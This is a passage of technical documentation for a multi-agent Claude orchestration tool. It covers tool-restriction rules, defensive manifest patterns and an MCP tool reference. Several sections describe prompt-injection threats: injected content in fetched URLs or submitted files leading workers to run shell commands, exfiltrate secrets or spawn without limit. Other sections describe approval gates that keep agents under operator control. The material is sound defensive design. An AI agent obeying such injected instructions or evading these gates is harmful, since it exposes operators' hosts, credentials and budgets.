directory = "/output/public"
tools = ["WebFetch", "Read", "Write", "Glob"]
prompt = """
Fetch the URLs in urls.txt. Write a summary of each to summaries/.
Do not read files outside this directory.
"""
```
The worker can be injected, but an injected instruction can only write to the output directory and fetch URLs. It cannot read `~/.ssh/`, env vars, or any file not under `/output/public`. Limit `directory` tightly and restrict `Read` to paths within it.
B + C: sensitive data plus state-changing actions
Use this pair for workers that act on internal data only — your own repository, your own credentials (passed via env), your own infrastructure. These workers must never read untrusted external content.
```toml
[[task]]
id = "apply-refactor"
directory = "/internal/repo"
tools = ["Read", "Write", "Edit", "Glob", "Grep"]
prompt = """
Apply the refactor described in /internal/repo/PLAN.md.
Do not fetch external URLs or read paths outside this repository.
"""
```
There is no WebFetch or Bash here. The prompt is fully operator-authored. There is no external input path for injection. The risk is model error, not injection — which is mitigated by review (plan approval, approval-gated writes) rather than tool restriction.
A + B: untrusted input plus sensitive data (no state-changing)
This is the lead-as-evaluator pattern. A read-only lead (or worker) ingests external content and internal context simultaneously, but cannot act. Its output is a report or recommendation — the operator (or a separate write-capable worker) decides whether to act on it.
[[lead]]
id = "evaluator"
directory = "/internal/repo"
tools = ["Read", "Glob", "Grep"]
prompt = """
Read the user-submitted PR description in /tmp/pr-body.txt.
Read the affected source files in this repo.
Produce a structured review report to stdout.
Do not spawn workers that have Write or Bash.
"""
No Write, Edit, or Bash. An injected instruction in pr-body.txt can only affect what the report says — it cannot modify the repository.
Wiring the Rule of Two in a pitboss manifest
Tool restrictions per worker
Set tools at [defaults] for a baseline, then tighten per-task or per-lead:
[defaults]
# Baseline: read-only
tools = ["Read", "Glob", "Grep"]
[[lead]]
id = "root"
# The root lead only needs to read and coordinate
tools = ["Read", "Glob", "Grep"]
# Spawn workers with expanded tools only when explicitly needed:
# spawn_worker(prompt = "...", tools = ["Read", "Write", "Edit"])
The tools argument on spawn_worker overrides the per-task default for that worker. See Manifest schema for the field reference.
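The precedence chain — `[defaults]` baseline, per-lead tightening, spawn-time override — can be sketched as a simple most-specific-wins lookup. This is an illustrative model, not the dispatcher's actual resolution code:

```python
# Illustrative sketch: the most specific tool grant wins —
# spawn-time override, then the lead's tools, then [defaults].
def effective_tools(defaults, lead_tools=None, spawn_tools=None):
    if spawn_tools is not None:
        return spawn_tools
    if lead_tools is not None:
        return lead_tools
    return defaults

baseline = ["Read", "Glob", "Grep"]
# A worker spawned with no override inherits the lead's read-only set:
assert effective_tools(baseline, ["Read"]) == ["Read"]
# An explicit spawn-time grant expands tools for that worker only:
assert effective_tools(baseline, ["Read"],
                       ["Read", "Write", "Edit"]) == ["Read", "Write", "Edit"]
```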
Sub-leads as isolation envelopes
A sub-lead’s budget_usd and max_workers cap what the sub-tree can consume, but isolation also comes from the KV layer boundary and read_down = false. Sub-leads with different Rule-of-Two profiles should not have read_down = true pointing at each other.
# Untrusted-input sub-tree: small budget, no read-down into trusted tree
spawn_sublead(
prompt = "Process the user-submitted documents in /tmp/uploads/...",
budget_usd = 0.50,
max_workers = 2,
read_down = false
)
Approval policy as a gate on state-changing tools
Use [[approval_policy]] to require operator review before any state-changing tool invocation. This does not prevent state changes — it gates them on explicit approval:
# Auto-approve reads; block anything that writes or runs commands
[[approval_policy]]
match = { category = "tool_use", tool_name = "Read" }
action = "auto_approve"
[[approval_policy]]
match = { category = "tool_use", tool_name = "Grep" }
action = "auto_approve"
[[approval_policy]]
match = { category = "tool_use" }
action = "block"
See Defense-in-depth patterns → Approval-gated state-changing tools for a complete example.
The lead-as-evaluator pattern in detail
The lead-as-evaluator splits the A+B pair from the C property by using separate actors:
- Evaluator lead — holds A+B, no C. Reads external content + internal data, produces a structured plan. Tool set: `["Read", "Glob", "Grep"]`.
- Action worker — holds B+C, no A. Receives only the evaluator’s plan (operator-reviewed, operator-authored at the point of handoff). Tool set: `["Read", "Write", "Edit"]` or `["Bash"]`.
The handoff goes through the operator approval queue. The evaluator’s propose_plan output is reviewed before any write-capable worker is spawned. See Defense-in-depth patterns for a runnable manifest.
Common violations and their consequences
| Violation | Consequence |
|---|---|
| Giving `Bash` to a worker that reads user-submitted content | Arbitrary shell execution on the host if the content contains an injected instruction |
| Passing secrets via the prompt or `/ref/*` to a worker that reads external URLs | Secrets exfiltrated if the worker is injected |
| Running a depth-2 sub-lead with `read_down = true` that also processes untrusted input | Root KV contents visible to an injected sub-tree |
| Not setting `budget_usd` on a hierarchical run that could receive externally-triggered work | Unbounded cost if the lead is manipulated into spawning continuously |
See also:
- Threat model — what pitboss does and does not defend against
- Defense-in-depth patterns — runnable manifest recipes for each of these patterns
- Manifest schema → `tools` — `tools` field reference
- Approvals — `[[approval_policy]]` reference
Defense-in-depth patterns
Each pattern below maps to a specific pitboss feature. For each one: what threat it addresses, a minimal manifest snippet, and what it does not cover.
1. Read-only lead, write-capable worker
Addresses: Prompt injection in the evaluation phase. The lead reads and reasons; workers act only after operator review.
This is the lead-as-evaluator pattern from The Rule of Two. The lead holds (A+B) — it may read untrusted content alongside internal data — but has no Write, Edit, or Bash. Workers hold (B+C) but receive only an operator-reviewed plan.
[run]
max_workers = 4
budget_usd = 5.00
require_plan_approval = true
[[lead]]
id = "evaluator"
directory = "/repo"
tools = ["Read", "Glob", "Grep"]
prompt = """
Read the user-submitted spec in /tmp/spec.md and the existing codebase.
Produce a plan via propose_plan listing every file to change and why.
Do not spawn workers until the plan is approved.
"""
When the lead calls propose_plan, the TUI surfaces it for operator review. Only after the operator approves does spawn_worker become permitted. The operator can reject with a reason, and the lead can revise.
Workers are spawned with explicit tool grants at spawn time:
# Example lead prompt continues:
# spawn_worker(
# prompt = "Implement the plan. Write only to the paths listed.",
# tools = ["Read", "Write", "Edit", "Glob", "Grep"]
# )
What this does not cover: The operator approves the plan text, not every individual write. A worker that implements the approved plan can still make incorrect edits within that scope. Use per-write request_approval calls (pattern 3) if you need individual write approval.
2. Untrusted input quarantine via sub-leads
Addresses: Prompt injection in an externally-sourced sub-task propagating to the rest of the run.
A sub-lead that processes untrusted external content is given a bounded envelope and strict KV isolation. Its workers have no Write or Bash. Findings return only through Event::Result — the root lead reads the result, decides what (if anything) to do with it.
[run]
max_workers = 8
budget_usd = 10.00
lead_timeout_secs = 3600
[[lead]]
id = "root"
allow_subleads = true
max_subleads = 3
directory = "/repo"
tools = ["Read", "Glob", "Grep"]
prompt = """
For each URL in /tmp/urls.txt, spawn a sub-lead to fetch and summarize it.
Use budget_usd = 0.50 and max_workers = 2 per sub-lead.
Set read_down = false on each sub-lead.
After all sub-leads finish, read their terminal results and produce a
combined report. Do not pass any sub-lead's raw output directly to another.
"""
[lead.sublead_defaults]
budget_usd = 0.50
max_workers = 2
lead_timeout_secs = 300
read_down = false
Each sub-lead spawned for external URLs gets:
- `budget_usd = 0.50` — cost cap per external document
- `read_down = false` — the root lead cannot see the sub-lead’s KV store, so a sub-lead cannot smuggle injected data into `/ref/*` that root then acts on
- Workers with read-only tools only (configured by the sub-lead’s own prompt)
The sub-lead’s workers might have:
# Sub-lead spawns workers like:
# spawn_worker(
# prompt = "Fetch the URL and write a 3-bullet summary. Nothing else.",
# tools = ["WebFetch", "Read"]
# )
What this does not cover: The sub-lead’s Event::Result text is itself untrusted output — an injected worker could craft a malicious result. The root lead that reads results is read-only, so injected result content can affect the root’s report but not cause write actions directly. Apply pattern 3 or pattern 1 on top if root needs to act on the results.
3. Approval-gated state-changing tools
Addresses: Unreviewed file writes or shell commands. Every state-changing tool invocation surfaces to the operator before executing.
Use [[approval_policy]] to auto-approve cheap read operations and block all writes and shell invocations:
[run]
max_workers = 4
budget_usd = 8.00
approval_policy = "block"
# Auto-approve reads (high volume, low risk)
[[approval_policy]]
match = { category = "tool_use", tool_name = "Read" }
action = "auto_approve"
[[approval_policy]]
match = { category = "tool_use", tool_name = "Glob" }
action = "auto_approve"
[[approval_policy]]
match = { category = "tool_use", tool_name = "Grep" }
action = "auto_approve"
# Block all other tool-use (Write, Edit, Bash, etc.) for operator review
[[approval_policy]]
match = { category = "tool_use" }
action = "block"
Rules are evaluated first-match-wins. Read, Glob, and Grep are auto-approved. Any other tool-use — including Write, Edit, Bash, and any custom MCP tool — blocks for operator review.
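First-match-wins evaluation can be sketched as a linear scan over the rule list. This is an illustrative model of the semantics described above, not the dispatcher's implementation; the rule and event shapes are simplified:

```python
# Illustrative sketch of first-match-wins [[approval_policy]] evaluation.
# Mirrors the rules above: reads auto-approve, everything else blocks.
RULES = [
    ({"category": "tool_use", "tool_name": "Read"}, "auto_approve"),
    ({"category": "tool_use", "tool_name": "Glob"}, "auto_approve"),
    ({"category": "tool_use", "tool_name": "Grep"}, "auto_approve"),
    ({"category": "tool_use"}, "block"),
]

def decide(event: dict) -> str:
    for match, action in RULES:
        # A rule matches when every key it names equals the event's value.
        if all(event.get(k) == v for k, v in match.items()):
            return action            # first matching rule wins
    return "queue"                   # no rule matched (illustrative default)

assert decide({"category": "tool_use", "tool_name": "Read"}) == "auto_approve"
assert decide({"category": "tool_use", "tool_name": "Write"}) == "block"
assert decide({"category": "tool_use", "tool_name": "Bash"}) == "block"
```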
What this does not cover: [[approval_policy]] is not argument-aware. It gates whether Write is invoked, not which path the Write targets. Combine with tight directory scoping and read-only leads (pattern 1) for path-level control.
See Approvals for the full policy model.
4. Cost firewall via per-sub-lead envelopes
Addresses: A prompt-injected sub-tree spawning unbounded workers and consuming unbounded budget.
Each sub-lead spawned for externally-triggered work gets a budget cap enforced at the dispatcher level. Even if the sub-lead is injected with an instruction to spawn 100 workers, the envelope enforces the cap before any worker is launched.
[run]
max_workers = 20
budget_usd = 50.00
lead_timeout_secs = 7200
[[lead]]
id = "root"
allow_subleads = true
max_subleads = 10
max_sublead_budget_usd = 1.00 # hard cap: no sub-lead can get more than $1
max_workers_across_tree = 16
directory = "/repo"
prompt = """
For each incoming task in /tmp/queue.json, spawn a sub-lead with
budget_usd = 0.50, max_workers = 2, read_down = false.
"""
[lead.sublead_defaults]
budget_usd = 0.50
max_workers = 2
lead_timeout_secs = 600
read_down = false
max_sublead_budget_usd = 1.00 means a root lead cannot grant a sub-lead more than $1.00 even if it tries. The [lead.sublead_defaults] sets the default to $0.50. The combination caps per-task cost at $0.50 with a hard ceiling of $1.00.
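The interaction between the default and the hard cap can be sketched as follows. This is an illustrative model of the enforcement rule, not the dispatcher's code:

```python
# Illustrative sketch: sublead_defaults supplies the budget when the
# root lead doesn't ask for one; the manifest cap rejects oversized asks.
MAX_SUBLEAD_BUDGET_USD = 1.00   # manifest hard cap
DEFAULT_BUDGET_USD = 0.50       # [lead.sublead_defaults]

def sublead_budget(requested=None):
    budget = DEFAULT_BUDGET_USD if requested is None else requested
    if budget > MAX_SUBLEAD_BUDGET_USD:
        raise ValueError("budget exceeds max_sublead_budget_usd")
    return budget

assert sublead_budget() == 0.50      # default envelope
assert sublead_budget(1.00) == 1.00  # at the ceiling: allowed
try:
    sublead_budget(2.00)             # over the cap: rejected pre-state
except ValueError:
    pass
```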
When a sub-lead hits its budget_usd ceiling, spawn_worker returns budget exceeded and the sub-lead terminates (or handles the error, if its prompt instructs it to). The root lead receives the sub-lead’s terminal result and can decide whether to alert.
Configure [notifications] with budget_alert_threshold_pct to receive a webhook when any actor reaches a configured percentage of its budget.
What this does not cover: Budget caps do not prevent a sub-lead from using its full envelope on a single expensive operation. They cap total spend, not per-operation cost.
5. Run-global lease as serialization gate
Addresses: Multiple agents concurrently modifying a sensitive shared resource (a deploy pipeline, a credential store, a shared output file) and corrupting it through interleaved writes.
Require a run-global lease before any agent touches the shared resource. Only one agent at a time holds the lease; the rest wait or fail fast. The lease auto-releases if the holder crashes, so a dead agent cannot hold the lock indefinitely.
[run]
max_workers = 8
budget_usd = 20.00
[[lead]]
id = "root"
directory = "/deploy"
allow_subleads = true
prompt = """
For each service in services.txt:
1. Call run_lease_acquire("deploy.lock", ttl_secs=300) — wait up to 60s.
2. Perform the deploy steps.
3. Call run_lease_release(lease_id).
If acquire times out, report the service as skipped and continue.
"""
The ttl_secs = 300 ensures that if the deploy worker crashes mid-deploy, the lease expires after 5 minutes and the next actor can proceed. Do not set ttl_secs longer than the maximum acceptable stall duration.
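The TTL-expiry behavior can be sketched with a minimal in-memory lease. This is an illustrative model of the auto-release semantics, not pitboss's lease implementation:

```python
# Illustrative sketch of TTL-based lease expiry: a crashed holder never
# renews, so the lease becomes acquirable once expires_at passes.
class Lease:
    def __init__(self):
        self.holder, self.expires_at = None, 0.0

    def acquire(self, actor: str, ttl_secs: float, now: float) -> bool:
        if self.holder is None or now >= self.expires_at:
            self.holder, self.expires_at = actor, now + ttl_secs
            return True
        return False

lock = Lease()
assert lock.acquire("deploy-worker-1", ttl_secs=300, now=0.0)
# A second actor is refused while the lease is live:
assert not lock.acquire("deploy-worker-2", ttl_secs=300, now=100.0)
# After the TTL elapses (holder presumed crashed), the next actor proceeds:
assert lock.acquire("deploy-worker-2", ttl_secs=300, now=301.0)
```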
run_lease_acquire is the run-global variant. For resources internal to a single sub-tree, use lease_acquire instead. See Leases & coordination for when to use each.
What this does not cover: Leases serialize access but do not validate what the holder does during the lease. A holder that writes corrupt data will not be detected by the lease mechanism. Combine with plan approval (pattern 1) for write validation.
6. TTL + auto-reject fallback
Addresses: An approval that the operator cannot reach (off-hours, disconnected TUI, operational incident) stalling the run indefinitely — and then being approved automatically when the operator reconnects without reviewing the context.
Set a TTL on approval requests. When the TTL expires without a response, fallback = "auto_reject" causes the request to be rejected rather than queued for later approval.
[run]
max_workers = 4
budget_usd = 10.00
# Default: block approvals if no TUI connected
approval_policy = "block"
The lead’s prompt instructs it to pass a TTL on sensitive requests:
# In the lead's prompt:
# request_approval(
# summary = "About to run the deploy script for prod.",
# timeout_secs = 300,
# plan = {
# summary = "Run deploy.sh in /deploy/prod",
# risks = ["Deploys to production; irreversible without rollback procedure"],
# rollback = "Run deploy.sh --rollback"
# }
# )
#
# The lead prompt should handle rejection:
# If rejected or timed out, abort this task and report why.
To set a run-level fallback on all approval requests, combine the TTL with [[approval_policy]]:
# Block all approvals; set a cost-over firewall for large events
[[approval_policy]]
match = { category = "cost", cost_over = 1.00 }
action = "block"
Operator-side: if you expect off-hours runs where the TUI may be unattended, set approval_policy = "auto_reject" in [run] as the baseline. Approvals that aren’t explicitly auto-approved by a policy rule will reject rather than queue indefinitely.
What this does not cover: Auto-reject stops the action but does not roll back work already done. For actions that should be atomic (approve before any work or none), use propose_plan with require_plan_approval = true before any workers are spawned.
What you still need to provide
These are operator responsibilities that pitboss does not address:
Egress filtering. Firewall the host. Workers with Bash or WebFetch can reach any endpoint reachable from the OS. Pitboss imposes no network-level restrictions.
Secrets handling. Do not put API keys or credentials in the manifest. Use [defaults].env to pass secrets from the environment, or use a secrets manager. The manifest is written verbatim to manifest.snapshot.toml in the run directory.
Per-tool-invocation audit log. Pitboss produces one TaskRecord per worker (summary.jsonl), not a per-tool-call log. If you need a record of every Bash invocation or every path written to, you need a process-level audit hook or a claude-level wrapper.
Identity and access control. Pitboss assumes the operator is the only user. The MCP socket, TUI, and approval queue have no per-user access control. Multi-tenant deployments require an external wrapper.
See also:
- Threat model — full list of what pitboss does and does not defend against
- The Rule of Two — framework for deciding which tools each worker should have
- Approvals — full `[[approval_policy]]` reference
- Leases & coordination — per-layer vs. run-global leases
- Depth-2 sub-leads — sub-lead envelope and isolation model
MCP Tool Reference — Overview
In hierarchical mode, pitboss starts an MCP server on a unix socket and auto-generates an --mcp-config for the lead’s claude subprocess. All tools in this reference are automatically added to the lead’s --allowedTools list — the operator does not list them explicitly.
Workers get a narrower toolset (shared-store tools only; no spawn_worker, no spawn_sublead).
Tool categories
| Category | Page | Who can call |
|---|---|---|
| Session control | Session control | Lead only (root lead) |
| Coordination & state | Coordination & state | Lead + workers |
| Approvals | Approvals | Lead only |
MCP tool name prefix
All pitboss tools are prefixed mcp__pitboss__. In prompts and --allowedTools lists, use the full name:
mcp__pitboss__spawn_worker
mcp__pitboss__kv_get
mcp__pitboss__request_approval
Structured content wrapper
All tool responses are wrapped in a record ({ entry: ... }, { entries: [...] }, { workers: [...] }, etc.). Claude Code’s MCP client requires structuredContent to be a record, not a bare array or null. Unwrap one level when reading results in a lead prompt.
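Unwrapping one level looks like this. A minimal sketch, assuming the wrapper always has exactly one key (as in the examples above):

```python
# Illustrative sketch of the one-level unwrap: every response is a
# record with a single wrapper key, never a bare array or null.
def unwrap(response: dict):
    (key, value), = response.items()   # exactly one wrapper key
    return value

assert unwrap({"entries": [{"path": "/ref/a"}]}) == [{"path": "/ref/a"}]
assert unwrap({"entry": None}) is None   # missing path: null inside the record
```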
The bridge
Claude Code’s MCP client speaks stdio. The pitboss MCP server listens on a unix socket. Between them is pitboss mcp-bridge <socket> — a stdio-to-socket proxy auto-launched via the lead’s generated --mcp-config. You never invoke it directly.
Error patterns
| Error | Meaning | Recovery |
|---|---|---|
| `budget exceeded: $X spent + $Y reserved + $Z estimated > $B budget` | Not enough budget headroom to spawn | Finish existing work; surface to operator if needed |
| `worker cap reached: N active (max M)` | Too many live workers | Wait for one to finish via `wait_for_worker` or `wait_for_any` |
| `run is draining: no new workers accepted` | Operator Ctrl-C’d or lead was cancelled | Finish gracefully; don’t spawn new work |
| `unknown task_id` | Typo or referring to an unspawned worker | Call `list_workers` to see what’s registered |
| `SpawnFailed` | Worker never started (worktree prep failure, branch conflict, non-git directory) | Check stderr log |
| `plan approval required: call propose_plan ...` | `require_plan_approval = true` and no approved plan yet | Call `propose_plan` and wait for approval |
Full canonical reference
AGENTS.md in the source tree is the authoritative machine-readable reference for all tool schemas. The pages in this section derive from it and highlight the most important fields for human readers. If anything here conflicts with the binary’s actual behavior, the binary wins — file a PR against this book.
Session control tools
These tools are available to the root lead only. Sub-leads can call spawn_worker (for their own workers) but not spawn_sublead (the depth-2 cap is enforced at both the MCP handler and the sub-lead’s --allowedTools).
spawn_worker
Spawn a new worker subprocess with a given prompt.
Args:
{
"prompt": "string (required)",
"directory": "string (optional, defaults to lead's directory)",
"branch": "string (optional, auto-generated if omitted)",
"tools": ["string"],
"timeout_secs": 600,
"model": "claude-haiku-4-5"
}
Returns: { "task_id": "string", "worktree_path": "string or null" }
Rules:
- `prompt` is required.
- `directory` defaults to the lead’s `directory`.
- `model` defaults to the lead’s model. Override per-worker when you need a heavier worker (Sonnet or Opus) under a Haiku lead.
- `tools` defaults to the lead’s `tools`.
- Fails with `budget exceeded` if `spent + reserved + next_estimate > budget_usd`.
- Fails with `worker cap reached` if the number of live workers equals `max_workers`.
- Fails with `plan approval required` if `require_plan_approval = true` and no plan has been approved yet.
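The budget-headroom rule can be made concrete as an inequality check. An illustrative sketch mirroring the `budget exceeded` error text, not the dispatcher's accounting code:

```python
# Illustrative sketch of the spawn_worker budget rule: a spawn is
# allowed only while spent + reserved + next_estimate <= budget_usd.
def can_spawn(spent, reserved, next_estimate, budget_usd):
    return spent + reserved + next_estimate <= budget_usd

assert can_spawn(3.00, 1.00, 0.50, 5.00)        # within budget: ok
assert not can_spawn(3.00, 1.50, 0.75, 5.00)    # would exceed: 'budget exceeded'
```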
spawn_sublead (v0.6+, root lead only)
Spawn a sub-lead with its own Claude session, budget envelope, and isolated coordination layer.
Args:
{
"prompt": "string (required)",
"model": "string (required)",
"budget_usd": 2.00,
"max_workers": 4,
"lead_timeout_secs": 1800,
"initial_ref": { "key": "value" },
"read_down": false
}
Returns: { "sublead_id": "string" }
- Available only when `allow_subleads = true` in the manifest.
- `budget_usd` and `max_workers` are required unless `read_down = true`.
- `initial_ref` seeds the sub-lead’s `/ref/*` namespace at spawn time.
- Fails if `budget_usd > max_sublead_budget_usd` (manifest cap enforcement, pre-state).
wait_actor (v0.6+)
Wait for any actor (worker or sub-lead) to settle. Generalizes wait_for_worker.
Args: { "actor_id": "string", "timeout_secs": 120 }
Returns: ActorTerminalRecord — either { "Worker": TaskRecord } or { "Sublead": SubleadTerminalRecord } depending on actor type.
wait_for_worker is retained as a back-compat alias; it unwraps the Worker variant.
wait_for_worker
Block until a specific worker settles (back-compat alias for wait_actor on worker ids).
Args: { "task_id": "string", "timeout_secs": 120 }
Returns: Full TaskRecord when the worker settles.
wait_for_any
Block until the first of a list of workers settles.
Args: { "task_ids": ["string"], "timeout_secs": 120 }
Returns: { "task_id": "string", "record": TaskRecord } — the first to finish.
worker_status
Non-blocking peek at a worker’s current state.
Args: { "task_id": "string" }
Returns: { "state": "Running|Paused|Frozen|Done|...", "started_at": "...", "partial_usage": {...}, "last_text_preview": "...", "prompt_preview": "..." }
list_workers
Snapshot of all active and completed workers.
Args: {}
Returns: { "workers": [{ "task_id": "string", "state": "...", "prompt_preview": "...", "started_at": "..." }, ...] }
cancel_worker
Signal a worker’s cancel token, terminating the subprocess.
Args: { "task_id": "string", "reason": "optional string" }
Returns: { "ok": true }
When reason is supplied, a synthetic [SYSTEM] reprompt is delivered to the killed actor’s direct parent lead. This lets the parent adapt without a separate reprompt_worker call.
pause_worker
Pause a running worker. Two modes:
| mode | Behavior |
|---|---|
| `"cancel"` (default) | Terminate the subprocess + snapshot `claude_session_id`. `continue_worker` spawns `claude --resume`. Zero context loss on Anthropic’s side; some reload cost on resume. |
| `"freeze"` (v0.5+) | SIGSTOP the subprocess in place. `continue_worker` sends SIGCONT. No state loss at all, but long freezes risk Anthropic dropping the HTTP session — use for short pauses only. |
Args: { "task_id": "string", "mode": "cancel|freeze" }
Returns: { "ok": true }
Fails if the worker is not in Running state with an initialized session.
continue_worker
Resume a paused or frozen worker.
Args: { "task_id": "string", "prompt": "optional string" }
Returns: { "ok": true }
- For paused (cancel-mode) workers: spawns `claude --resume <session_id>`. Optional `prompt` is added to the resume.
- For frozen workers: sends SIGCONT. `prompt` is ignored for frozen workers — use `reprompt_worker` after continue if you want to redirect.
reprompt_worker
Mid-flight course correction: terminate and restart a worker with a new prompt, preserving the claude session via --resume.
Args: { "task_id": "string", "prompt": "string (required)" }
Returns: { "ok": true }
Differs from pause_worker + continue_worker in that the new prompt replaces the worker’s current direction rather than resuming it. Use when a worker has gone off-track and you want to give it an explicit correction.
Coordination & state tools
These tools are available to both leads and workers (though with different access levels depending on the namespace). They operate on the current layer’s in-memory KV store.
For guidance on when to use /leases/* (per-layer) vs run_lease_acquire (run-global), see Lease scope selection.
KV namespaces recap
| Namespace | Lead can write | Worker can write | Notes |
|---|---|---|---|
/ref/* | Yes | No | Lead-authored shared context for all workers |
/peer/<id>/* | Yes (any actor) | Only own path | Per-worker output slots |
/peer/self/* | Yes | Yes | Alias resolving to caller’s actor id |
/shared/* | Yes | Yes | Loose cross-worker coordination |
/leases/* | Managed | Managed | Via lease_acquire / lease_release only |
kv_get
Read a single entry.
Args: { "path": "/ref/config" }
Returns: { "entry": { "path": "...", "value": "bytes", "version": 1, "updated_at": "..." } | null }
Returns null in the entry field if the path does not exist (wrapped in a record per MCP spec).
kv_set
Write a value to a path. Increments the version on each write.
Args:
{
"path": "/shared/findings/my-result",
"value": "bytes (UTF-8 string or base64)",
"override_flag": false
}
Returns: { "version": 2 }
- Workers can only write to their own `/peer/<self>/*` or `/shared/*`. Writing to another worker’s `/peer/<X>/*` returns `Forbidden`.
- `override_flag` — reserved; currently unused.
kv_cas
Compare-and-swap: write only if the current version matches.
Args:
{
"path": "/shared/counter",
"expected_version": 3,
"new_value": "bytes",
"override_flag": false
}
Returns: { "version": 4, "swapped": true }
- `swapped: false` means the version didn’t match; the write was not applied.
- Use `kv_cas` when multiple workers might write the same path to avoid lost updates.
kv_list
List entries matching a glob pattern.
Args: { "glob": "/shared/findings/*" }
Returns: { "entries": [{ "path": "...", "version": 1, "updated_at": "..." }, ...] }
Returns metadata only (no values). Follow up with kv_get for values.
kv_wait
Block until a path reaches a minimum version. Useful for workers to wait until the lead writes a shared configuration, or for the lead to wait until a worker writes its result.
Args:
{
"path": "/peer/self/completed",
"timeout_secs": 60,
"min_version": 1
}
Returns: Entry when the condition is met. Times out with an error if timeout_secs elapses.
lease_acquire
Acquire a named mutex within the current layer. Auto-released on actor termination.
Args:
{
"name": "/leases/output-file",
"ttl_secs": 30,
"wait_secs": 10
}
Returns: { "lease_id": "uuid", "version": 1, "acquired_at": "...", "expires_at": "..." }
- `name` is a path under `/leases/*`.
- `ttl_secs` — how long the lease lives after acquisition.
- `wait_secs` — block up to this many seconds for the lease to become available. If omitted, fail immediately if already held.
- The error message on contention names the current holder, so the requesting actor knows who to wait on.
lease_release
Release a held lease.
Args: { "lease_id": "uuid" }
Returns: { "ok": true }
run_lease_acquire (v0.6+)
Acquire a run-global mutex. Scoped to the entire dispatch (not per-layer). Use for resources that span sub-trees.
Args: { "key": "string", "ttl_secs": 30 }
Returns: { "lease_id": "uuid", "version": 1 }
Auto-released on actor termination, same as per-layer leases.
run_lease_release (v0.6+)
Release a run-global lease.
Args: { "lease_id": "uuid" }
Returns: { "ok": true }
Coordination patterns
Lead writes a shared config; workers read it
# Lead:
kv_set(path="/ref/config", value="target: main branch")
# Workers (in prompt):
Read /ref/config via mcp__pitboss__kv_get. Then proceed with the task.
Worker signals completion; lead polls
# Worker:
kv_set(path="/peer/self/done", value="true")
# Lead:
kv_wait(path="/peer/<worker-id>/done", timeout_secs=120, min_version=1)
Workers coordinate via CAS counter
# Worker (pseudo):
while true:
entry = kv_get("/shared/next-chunk")
n = entry.version
result = kv_cas("/shared/next-chunk", expected_version=n, new_value=str(n+1))
if result.swapped:
process_chunk(n)
break
# else: another worker got there first, retry
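The pseudo-code above can be made concrete against an in-memory stand-in for the KV store. An illustrative sketch only — the real store lives inside the pitboss MCP server, and the shapes here are simplified:

```python
# In-memory stand-in for the layer KV store, illustrating the CAS
# claim loop above. Not the pitboss API.
class Store:
    def __init__(self):
        self.data = {}   # path -> (version, value); missing paths read as version 0

    def get(self, path):
        return self.data.get(path, (0, None))

    def cas(self, path, expected_version, new_value):
        version, _ = self.data.get(path, (0, None))
        if version != expected_version:
            return {"version": version, "swapped": False}
        self.data[path] = (version + 1, new_value)
        return {"version": version + 1, "swapped": True}

def claim_chunk(store):
    """Retry until this worker uniquely claims the next chunk number."""
    while True:
        n, _ = store.get("/shared/next-chunk")
        if store.cas("/shared/next-chunk", n, str(n + 1))["swapped"]:
            return n   # this worker owns chunk n
        # else: another worker bumped the version first; retry

store = Store()
claimed = {claim_chunk(store) for _ in range(3)}
assert claimed == {0, 1, 2}   # three claims, no duplicates
```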
For a canonical reference, see AGENTS.md in the source tree.
Approval tools
These tools are available to the lead (and sub-leads). Workers cannot call approval tools.
For the operator-side view (TUI, [[approval_policy]] rules, [run].approval_policy), see Approvals.
request_approval
Gate a single in-flight action on operator approval. The lead blocks until the operator approves, rejects, or edits.
Args:
{
"summary": "string (required)",
"timeout_secs": 60,
"plan": {
"summary": "string (required)",
"rationale": "string",
"resources": ["list of files/APIs/PRs that will be touched"],
"risks": ["known failure modes"],
"rollback": "how to undo if something goes wrong"
},
"tool_name": "string (optional hint for policy matching)",
"cost_estimate": 0.05
}
Returns:
{
"approved": true,
"comment": "optional operator comment",
"edited_summary": "optional operator-edited version of summary"
}
Notes:
- The `plan` field is optional for simple approvals but strongly recommended for non-trivial actions (deletions, multi-file edits, irreversible operations).
- `tool_name` and `cost_estimate` are hints that allow `[[approval_policy]]` rules to match on `tool_name` / `cost_over` criteria.
- Policy rules (if configured) are evaluated before the request reaches the operator queue. A matching `auto_approve` or `auto_reject` rule skips the operator entirely.
propose_plan
Gate the entire run on operator pre-flight approval. Submit an execution plan before spawning any workers.
Args:
{
"plan": {
"summary": "string (required)",
"rationale": "string",
"resources": ["files, services, PRs that will be touched"],
"risks": ["known failure modes"],
"rollback": "how to undo"
},
"timeout_secs": 120
}
Returns: Same shape as request_approval.
Notes:
- When `[run].require_plan_approval = true`, `spawn_worker` refuses until a `propose_plan` call has received `approved: true`.
- The TUI modal shows `[PRE-FLIGHT PLAN]` in the title (vs `[IN-FLIGHT ACTION]` for `request_approval`) so operators can tell them apart.
- On rejection, the gate stays closed — the lead can revise and call `propose_plan` again.
- When `require_plan_approval = false` (the default), calling `propose_plan` is informational only — `spawn_worker` never checks the result.
ApprovalPlan schema
{
"summary": "required; appears in the modal title",
"rationale": "optional; why this action should be taken",
"resources": ["optional; files, APIs, PRs that will be touched"],
"risks": ["optional; known failure modes — TUI highlights these in warning color"],
"rollback": "optional; how to undo if something goes wrong"
}
Use the structured plan form for any non-trivial approval. The bare summary string form (no plan field) still works for simple approvals.
Approval TTL and fallback (v0.6+)
Prevent an unreachable operator from permanently stalling the tree:
- `timeout_secs` in the call sets a per-approval TTL.
- A background watcher applies the run-level `approval_policy` as the fallback when the TTL expires.
If approval_policy = "auto_reject" and a lead calls request_approval with timeout_secs = 30, the approval auto-rejects after 30 seconds if no operator responds.
Reject-with-reason
When an operator rejects with a reason comment, the reason flows back in comment. The lead can use it to adapt immediately — for example, switching output format — without a separate reprompt_worker call.
Example prompt pattern:
result = request_approval(summary="Write results as JSON?", ...)
if not result.approved:
# result.comment might say "use CSV, not JSON"
write_as_csv(findings)
Cookbook — Spotlights overview
The dogfood spotlights are repeatable end-to-end tests that prove pitboss v0.6 features work from the operator’s perspective. They drive the real pitboss dispatch CLI or in-process integration tests — not just unit tests of the library.
All spotlight source files live under examples/dogfood/ in the repository.
Running spotlights
Shell script (subprocess demo):
bash examples/dogfood/fake/01-smoke-hello-sublead/run.sh
All dogfood tests via Cargo:
cargo test --test dogfood_fake_flows
Full suite:
cargo test --workspace --quiet
Fake vs. real spotlights
fake/ spotlights use the fake-claude binary with pre-baked JSONL scripts. Fully deterministic, fast (~1s), no Anthropic API calls.
real/ spotlights (R1–R3) use the actual claude binary. They require PITBOSS_DOGFOOD_REAL=1 and a valid Anthropic API key. They count against your quota.
Spotlight index
Fake spotlights
| # | Name | What it proves | Cargo test |
